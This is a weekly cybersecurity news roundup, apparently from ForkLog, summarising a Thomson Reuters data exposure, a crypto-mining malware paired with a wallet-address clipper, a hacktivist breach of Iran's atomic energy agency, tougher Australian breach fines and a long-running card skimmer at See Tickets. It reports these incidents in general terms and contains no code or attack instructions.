We have compiled the week’s most important cybersecurity news.
- Thomson Reuters suffered a 3 TB data leak.
- Attackers carried out a series of double attacks on cryptocurrency holders.
- See Tickets disclosed a credit-card theft that lasted 2.5 years.
- Australia announced a 22-fold increase in penalties for corporations for data breaches.
Thomson Reuters suffered a 3 TB data leak
The media conglomerate Thomson Reuters disclosed a leak of nearly 3 TB of confidential information about clients and other corporate data due to three databases being left exposed. The incident was reported by researchers Cybernews.
According to them, the files were stored unencrypted and consisted of registration data collected during interactions with clients.
Timestamps on the samples obtained by researchers indicated the data were current, with some dating back to October 26, 2022.
The leak also contains documents with corporate and legal information about specific companies and individuals.
One of the exposed databases included an internal audit of other platforms, such as YouTube, Thomson Reuters’ access logs, and connection strings to other databases.
According to experts, exposing connection strings is particularly dangerous, as it gives attackers access to the entire Reuters internal network.
Researchers also found password-reset and sign-in logs. Without exposing old or new passwords, the logs reveal the account owner’s email address and the exact time a password-change request was submitted.
Following the notice of the breach, Thomson Reuters immediately closed access to the exposed instances.
According to the conglomerate’s statement, the breach affected two public servers and a test server for the ONESOURCE Global Trade Offering product. The company says these contained non-critical information required for operational support of the platform.
The precise extent of the damage will be determined by the internal investigation now underway.
Attackers carried out a series of double-attacks on cryptocurrency holders
Cyble researchers found malware that mines coins and also loads a clipper capable of substituting a cryptocurrency wallet address in the clipboard.
Infection typically begins with a phishing email containing a malicious attachment, or when the victim downloads any mining software from untrustworthy sites.
The clipper is launched simultaneously with the mining process.
It also creates a мьютекс, to ensure only a single instance of the malware runs on the victim’s system. Thus the attackers use two different families of malware to profit financially.
The clipper targets various cryptocurrencies, including Bitcoin, Ethereum, XRP, Monero, Zcash, Dogecoin, TRON, Polkadot, Tezos, Cosmos, Cardano, BNB and others.
Hackers breached Iran’s Atomic Energy Organization
The hacktivist group Black Reward claimed responsibility for the breach of Iran’s Atomic Energy Organization, releasing more than 50 GB of data. At the time of writing, the hackers’ Twitter account was suspended.
According to the hackers, the archive contains emails, contracts and construction plans related to Iran’s Bushehr nuclear power plant.
They demanded the release of political prisoners detained during recent protests, threatening to publish documents on Tehran’s nuclear program.
The Iranian government confirmed the incident on Sunday, October 23.
The Atomic Energy Organization of Iran said that the subsidiary’s mail server was breached as a result of a foreign attack aimed at exerting media pressure on the Iranian authorities.
The agency added that unauthorized access to the email system led to publication of some letters’ contents on social media, but the data did not contain any sensitive information.
Australia announced a 22-fold increase in penalties for corporations over data breaches
Australian authorities announced tougher penalties for commercial companies that cause user data breaches.
Fines for serious privacy breaches are proposed to rise from A$1.4 million to A$32 million. Corporations could also be fined up to 30% of annual revenue for a given period if that figure exceeds A$32 million.
The amendments will be introduced to Parliament next week.
The proposal comes shortly after major data breaches at Optus and Medibank.
Medibank recently said that attackers had much greater access to customers’ personal information than initially thought. Specifically, hackers compromised the personal data of customers of the subsidiary brand AHM, all international student clients, Medibank customers, and large datasets relating to the aforementioned categories of medical services.
Medibank also found cases of data exfiltration and destruction of some information to which the attackers gained access.
See Tickets reveals a credit-card theft spanning 2.5 years
See Tickets, a ticketing services provider, said that cybercriminals could access payment card data through a skimmer on the site.
The company discovered the breach in April 2021 and began investigating with the help of Visa, MasterCard, American Express and Discover. Its findings showed the infection occurred on June 25, 2019.
The malicious JavaScript code was fully removed from the site only on January 8, 2022.
The leaked customer data included full names, postal codes, card numbers, expiration dates and CVVs.
Social Security numbers, state IDs, and bank account information were not disclosed, as they are not stored in the systems.
See Tickets did not reveal the number of affected customers, nor whether any of the five other domains used by the company in the U.S., Canada and Europe were compromised.
GPS restricted on Russian smartphones
Since around May, some Android smartphone users noticed slow GPS and inaccurate positioning. The issue was studied by an enthusiast going by the nickname KorDen32.
He found that the GPS function on phones powered by Qualcomm and MediaTek chips may be deliberately restricted. Chipmakers block access to A-GPS.
A-GPS provides access to the so-called almanac — a rough map of satellite movement for the week. In the absence of this information, the phone when starting GPS scans all available satellites in search of an optimal signal, affecting location-fix speed.
KorDen32 noted that connecting a Qualcomm-powered smartphone to satellites with an active VPN took several seconds.
The reasons why manufacturers might hinder satellite hardware on Russian smartphones, the enthusiast could not specify.
Also on ForkLog:
- The U.S. DOJ filed a lawsuit against the founder of the bitcoin mixer Helix.
- 3Commas and FTX reported a compromise of API keys for a number of users. Later, the head of FTX assessed the damages from the incident.
- A participant in the Mango Markets attack earned another $100,000 on the Mango Inu meme token.
- Changpeng Zhao spoke about progress in finding the attacker of the BSC Token Hub bridge.
- A researcher accused Monkey Drainer phishing scammers of stealing $1 million in cryptocurrency.
- A hacker withdrew from the DeFi protocol Team Finance assets worth $15.8 million.
- In the UK, calls to ban the police from using facial recognition.
- The head of Binance warned about the spread of phishing sites via Google.
- Experts counted up to 15 smart-contract scams per hour.
What to read this weekend?
We explain why governments want access to citizens’ correspondence and how this threatens end-to-end encryption.
Read ForkLog’s bitcoin news in our Telegram — cryptocurrency news, prices and analysis.